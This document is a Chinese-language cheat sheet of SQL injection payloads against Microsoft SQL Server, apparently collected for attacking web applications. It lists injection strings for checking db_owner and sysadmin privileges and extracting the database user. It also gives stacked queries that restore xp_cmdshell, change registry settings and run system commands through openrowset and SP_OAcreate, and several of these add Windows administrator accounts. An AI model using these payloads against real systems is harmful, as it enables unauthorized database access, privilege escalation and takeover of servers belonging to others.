//看看是什么权限的
  and 1=(Select IS_MEMBER('db_owner'))
  And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
  //检测是否有读取某数据库的权限
  and 1= (Select HAS_DBACCESS('master'))
  And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
  数字类型
  and char(124)%2Buser%2Bchar(124)=0
  字符类型
  ' and char(124)%2Buser%2Bchar(124)=0 and ''='
  搜索类型
  ' and char(124)%2Buser%2Bchar(124)=0 and '%'='
  爆用户名
  and user>0
  ' and user>0 and ''='
  检测是否为SA权限
  and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
  And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
  检测是不是MSSQL数据库
  and exists (select * from sysobjects);--
  检测是否支持多行
  ;declare @d int;--
  恢复 xp_cmdshell
  ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
  select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
  //-----------------------
  //      执行命令
  //-----------------------
  首先开启沙盘模式:
  exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1
  然后利用jet.oledb执行系统命令
  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:winntsystem32iasias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
  执行命令
  ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:WINNTsystem32cmd.exe /c net user paf pafpaf /add';--
  EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:1111'
  判断xp_cmdshell扩展存储过程是否存在:
  http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')